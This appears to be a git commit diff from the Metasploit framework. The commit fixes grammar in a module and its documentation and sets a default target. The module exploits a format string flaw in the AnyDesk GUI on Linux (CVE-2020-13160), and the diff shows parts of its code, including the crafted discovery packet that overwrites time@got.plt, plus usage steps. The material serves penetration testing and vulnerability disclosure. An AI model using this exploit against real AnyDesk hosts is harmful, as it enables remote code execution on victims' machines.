Fix some grammatical mistakes and set a default target for anydesk
This commit is contained in:
parent
bb33bc9c62
commit
a27bf9df38
|
@ -3,18 +3,17 @@
|
|||
This vulnerability affects Linux versions 5.5.2 and older. Old versions of AnyDesk can be downloaded from their site at
|
||||
https://download.anydesk.com/linux/. Use the `.deb` package for an Ubuntu installation.
|
||||
|
||||
The check method on this exploit will send an AnyDesk discovery frame to the target host, which will cause the the
|
||||
target to respond with it's own discovery frame. Each of these are sent from a random source port to the default AnyDesk
|
||||
The `check` method on this exploit will send an AnyDesk discovery frame to the target host, which will cause the
|
||||
target to respond with its own discovery frame. Each of these are sent from a random source port to the default AnyDesk
|
||||
discovery service port of 50001. To configure the listening service in Metasploit, change the `SRVHOST` and `SRVPORT`
|
||||
options. The exploit will use this method to detect the remote hostname and confirm that the operating system is Linux
|
||||
before proceeding.
|
||||
|
||||
## Verification Steps
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Install the application
|
||||
1. Start the AnyDesk GUI. A window will open, leave it running.
|
||||
1. Start msfconsole
|
||||
1. Start `msfconsole`
|
||||
1. Do: `use exploit/linux/misc/cve_2020_13160_anydesk`
|
||||
1. Set the module options
|
||||
1. Do: `exploit`
|
||||
|
|
|
@ -1,5 +1,7 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
@ -14,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'AnyDesk GUI Format String Write',
|
||||
'Description' => %q{
|
||||
The AnyDesk GUI is vulnerable to a remotely exploitable format string vulnerability. By sending a specially
|
||||
crafted discovery packet, an attacker can corrupt the front end process when it loads or refreshes. While the
|
||||
crafted discovery packet, an attacker can corrupt the frontend process when it loads or refreshes. While the
|
||||
discovery service is always running, the GUI frontend must be started to trigger the vulnerability. On
|
||||
successful exploitation, code is executed within the context of the user who started the AnyDesk GUI.
|
||||
},
|
||||
|
@ -26,8 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2020-13160' ],
|
||||
[ 'URL', 'https://devel0pment.de/?p=1881' ],
|
||||
|
||||
[ 'URL', 'https://devel0pment.de/?p=1881' ]
|
||||
],
|
||||
'Payload' => {
|
||||
'Space' => 512,
|
||||
|
@ -56,6 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
{ 'stkref1' => 93, 'stkref2' => 165, 'time@got.plt' => 0x119ddc0 - 135 }
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => '2020-06-16'
|
||||
)
|
||||
)
|
||||
|
@ -148,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
udp_sock.put(build_discover_packet(hn, "#{bad_unicode}%#{target['time@got.plt']}x%#{target['stkref1']}$ln", 'ad', 'main'))
|
||||
print_status('Sent exploit frame, waiting for the GUI to refresh to trigger the vulnerability...')
|
||||
|
||||
handler
|
||||
ensure
|
||||
disconnect_udp
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue